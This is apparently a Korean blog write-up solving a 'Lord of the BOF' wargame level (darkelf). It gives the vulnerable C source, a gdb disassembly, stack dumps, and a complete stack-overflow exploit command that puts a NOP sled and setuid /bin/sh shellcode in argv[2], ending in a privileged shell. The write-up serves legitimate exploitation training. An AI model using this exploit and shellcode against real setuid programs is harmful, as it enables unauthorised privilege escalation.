BOF 원정대 – Level 6 (darkelf)

문제 소스는 아래와 같다.

/*
 The Lord of the BOF : The Fellowship of the BOF
- darkelf 
- egghunter + buffer hunter + check length of argv[1]
*/

#include <stdio.h>
#include <stdlib.h>

extern char **environ;

main(int argc, char *argv[])
{
 char buffer[40];
 int i;

 if(argc < 2){
 printf(argv error\n);
 exit(0);
 }

 // egghunter 
 for(i=0; environ[i]; i++)
 memset(environ[i], 0, strlen(environ[i]));

 if(argv[1][47] != '\xbf')
 {
 printf(stack is still your friend.\n);
 exit(0);
 }

 // check the length of argument
 if(strlen(argv[1]) > 48){
 printf(argument is too long!\n);
 exit(0);
 }

 strcpy(buffer, argv[1]); 
 printf(%s\n, buffer);

 // buffer hunter
 memset(buffer, 0, 40);
}

이번 문제는 환경변수를 이용할 수 없으며 버퍼 역시 0~40 까지는 삭제하고 크기가 48 Byte 이상이면 종료가 된다. 많은 제약이 있지만 처음 조건에서 argc가 2 이하이면 되므로 argv[2] 에다가 쉘코드를 넣어 공격이 가능하다.

[wolfman@localhost wolfman]$ gdb darkelf_tmp 
GNU gdb 19991004
Copyright 1998 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type show copying to see the conditions.
There is absolutely no warranty for GDB. Type show warranty for details.
This GDB was configured as i386-redhat-linux...
(gdb) disassemble main
Dump of assembler code for function main:
0x8048500 <main>: push %ebp
0x8048501 <main+1>: mov %esp,%ebp
0x8048503 <main+3>: sub $0x2c,%esp
0x8048506 <main+6>: cmpl $0x1,0x8(%ebp)
0x804850a <main+10>: jg 0x8048523 <main+35>
0x804850c <main+12>: push $0x8048670
0x8048511 <main+17>: call 0x8048410 <printf>
0x8048516 <main+22>: add $0x4,%esp
0x8048519 <main+25>: push $0x0
0x804851b <main+27>: call 0x8048420 <exit>
0x8048520 <main+32>: add $0x4,%esp
0x8048523 <main+35>: nop 
0x8048524 <main+36>: movl $0x0,0xffffffd4(%ebp)
0x804852b <main+43>: nop 
0x804852c <main+44>: lea 0x0(%esi,1),%esi
0x8048530 <main+48>: mov 0xffffffd4(%ebp),%eax
0x8048533 <main+51>: lea 0x0(,%eax,4),%edx
0x804853a <main+58>: mov 0x80497a4,%eax
0x804853f <main+63>: cmpl $0x0,(%eax,%edx,1)
0x8048543 <main+67>: jne 0x8048547 <main+71>
0x8048545 <main+69>: jmp 0x8048587 <main+135>
0x8048547 <main+71>: mov 0xffffffd4(%ebp),%eax
0x804854a <main+74>: lea 0x0(,%eax,4),%edx
0x8048551 <main+81>: mov 0x80497a4,%eax
0x8048556 <main+86>: mov (%eax,%edx,1),%edx
0x8048559 <main+89>: push %edx
0x804855a <main+90>: call 0x80483f0 <strlen>
0x804855f <main+95>: add $0x4,%esp
0x8048562 <main+98>: mov %eax,%eax
0x8048564 <main+100>: push %eax
0x8048565 <main+101>: push $0x0
0x8048567 <main+103>: mov 0xffffffd4(%ebp),%eax
0x804856a <main+106>: lea 0x0(,%eax,4),%edx
0x8048571 <main+113>: mov 0x80497a4,%eax
0x8048576 <main+118>: mov (%eax,%edx,1),%edx
0x8048579 <main+121>: push %edx
0x804857a <main+122>: call 0x8048430 <memset>
0x804857f <main+127>: add $0xc,%esp
---Type <return> to continue, or q <return> to quit---
0x8048582 <main+130>: incl 0xffffffd4(%ebp)
0x8048585 <main+133>: jmp 0x8048530 <main+48>
0x8048587 <main+135>: mov 0xc(%ebp),%eax
0x804858a <main+138>: add $0x4,%eax
0x804858d <main+141>: mov (%eax),%edx
0x804858f <main+143>: add $0x2f,%edx
0x8048592 <main+146>: cmpb $0xbf,(%edx)
0x8048595 <main+149>: je 0x80485b0 <main+176>
0x8048597 <main+151>: push $0x804867c
0x804859c <main+156>: call 0x8048410 <printf>
0x80485a1 <main+161>: add $0x4,%esp
0x80485a4 <main+164>: push $0x0
0x80485a6 <main+166>: call 0x8048420 <exit>
0x80485ab <main+171>: add $0x4,%esp
0x80485ae <main+174>: mov %esi,%esi
0x80485b0 <main+176>: mov 0xc(%ebp),%eax
0x80485b3 <main+179>: add $0x4,%eax
0x80485b6 <main+182>: mov (%eax),%edx
0x80485b8 <main+184>: push %edx
0x80485b9 <main+185>: call 0x80483f0 <strlen>
0x80485be <main+190>: add $0x4,%esp
0x80485c1 <main+193>: mov %eax,%eax
0x80485c3 <main+195>: cmp $0x30,%eax
0x80485c6 <main+198>: jbe 0x80485e0 <main+224>
0x80485c8 <main+200>: push $0x8048699
0x80485cd <main+205>: call 0x8048410 <printf>
0x80485d2 <main+210>: add $0x4,%esp
0x80485d5 <main+213>: push $0x0
0x80485d7 <main+215>: call 0x8048420 <exit>
0x80485dc <main+220>: add $0x4,%esp
0x80485df <main+223>: nop 
0x80485e0 <main+224>: mov 0xc(%ebp),%eax
0x80485e3 <main+227>: add $0x4,%eax
0x80485e6 <main+230>: mov (%eax),%edx
0x80485e8 <main+232>: push %edx
0x80485e9 <main+233>: lea 0xffffffd8(%ebp),%eax
0x80485ec <main+236>: push %eax
0x80485ed <main+237>: call 0x8048440 <strcpy>
0x80485f2 <main+242>: add $0x8,%esp
---Type <return> to continue, or q <return> to quit---
0x80485f5 <main+245>: lea 0xffffffd8(%ebp),%eax
0x80485f8 <main+248>: push %eax
0x80485f9 <main+249>: push $0x80486b0
0x80485fe <main+254>: call 0x8048410 <printf>
0x8048603 <main+259>: add $0x8,%esp
0x8048606 <main+262>: push $0x28
0x8048608 <main+264>: push $0x0
0x804860a <main+266>: lea 0xffffffd8(%ebp),%eax
0x804860d <main+269>: push %eax
0x804860e <main+270>: call 0x8048430 <memset>
0x8048613 <main+275>: add $0xc,%esp
0x8048616 <main+278>: leave 
0x8048617 <main+279>: ret 
0x8048618 <main+280>: nop 
0x8048619 <main+281>: nop 
0x804861a <main+282>: nop 
0x804861b <main+283>: nop 
0x804861c <main+284>: nop 
0x804861d <main+285>: nop 
0x804861e <main+286>: nop 
0x804861f <main+287>: nop 
End of assembler dump.
(gdb) b *main+279
Breakpoint 1 at 0x8048617
(gdb) r `python -c print 'A'*44 + '\xbf\xbf\xbf\xbf' + ' ' + '\x90'*110000`
Starting program: /home/wolfman/darkelf_tmp `python -c print 'A'*44 + '\xbf\xbf\xbf\xbf' + ' ' + '\x90'*110000`
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

Breakpoint 1, 0x8048617 in main ()
(gdb) x/32wx $esp
0xbffe4cfc: 0xbfbfbfbf 0x00000000 0xbffe4d44 0xbffe4d54
0xbffe4d0c: 0x40013868 0x00000003 0x08048450 0x00000000
0xbffe4d1c: 0x08048471 0x08048500 0x00000003 0xbffe4d44
0xbffe4d2c: 0x08048390 0x0804864c 0x4000ae60 0xbffe4d3c
0xbffe4d3c: 0x40013e90 0x00000003 0xbffe4e3c 0xbffe4e56
0xbffe4d4c: 0xbffe4e87 0x00000000 0xbffffc38 0xbffffc5a
0xbffe4d5c: 0xbffffc64 0xbffffc72 0xbffffc91 0xbffffca1
0xbffe4d6c: 0xbffffcba 0xbffffcd7 0xbffffd3f 0xbffffd4a
(gdb) 
0xbffe4d7c: 0xbffffd58 0xbffffd9b 0xbffffdae 0xbffffdc3
0xbffe4d8c: 0xbffffdd3 0xbffffde0 0xbffffdff 0xbffffe0a
0xbffe4d9c: 0xbffffe17 0xbffffe1f 0x00000000 0x00000003
0xbffe4dac: 0x08048034 0x00000004 0x00000020 0x00000005
0xbffe4dbc: 0x00000006 0x00000006 0x00001000 0x00000007
0xbffe4dcc: 0x40000000 0x00000008 0x00000000 0x00000009
0xbffe4ddc: 0x08048450 0x0000000b 0x000001f9 0x0000000c
0xbffe4dec: 0x000001f9 0x0000000d 0x000001f9 0x0000000e
(gdb) 
0xbffe4dfc: 0x000001f9 0x00000010 0x0febfbff 0x0000000f
0xbffe4e0c: 0xbffe4e37 0x00000000 0x00000000 0x00000000
0xbffe4e1c: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffe4e2c: 0x00000000 0x00000000 0x69000000 0x00363836
0xbffe4e3c: 0x6d6f682f 0x6f772f65 0x616d666c 0x61642f6e
0xbffe4e4c: 0x6c656b72 0x6d745f66 0x41410070 0x41414141
0xbffe4e5c: 0x41414141 0x41414141 0x41414141 0x41414141
0xbffe4e6c: 0x41414141 0x41414141 0x41414141 0x41414141
(gdb) 
0xbffe4e7c: 0x41414141 0xbfbf4141 0x9000bfbf 0x90909090
0xbffe4e8c: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffe4e9c: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffe4eac: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffe4ebc: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffe4ecc: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffe4edc: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffe4eec: 0x90909090 0x90909090 0x90909090 0x90909090
(gdb) q
The program is running. Exit anyway? (y or n) y
[wolfman@localhost wolfman]$ ./darkelf `python -c print 'A'*44 + '\xec\x4e\xfe\xbf' + ' ' + '\x90'*110000 + '\x31\xc0\xb0\x31\xcd\x80\x89\xc3\x89\xc1\x31\xc0\xb0\x46\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80'`
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

 bash$ id
uid=506(darkelf) gid=505(wolfman) egid=506(darkelf) groups=505(wolfman)
bash$ my-pass
euid = 506
kernel crashed
bash$ 

답글 남기기

이메일 주소는 공개되지 않습니다. 필수 필드는 *로 표시됩니다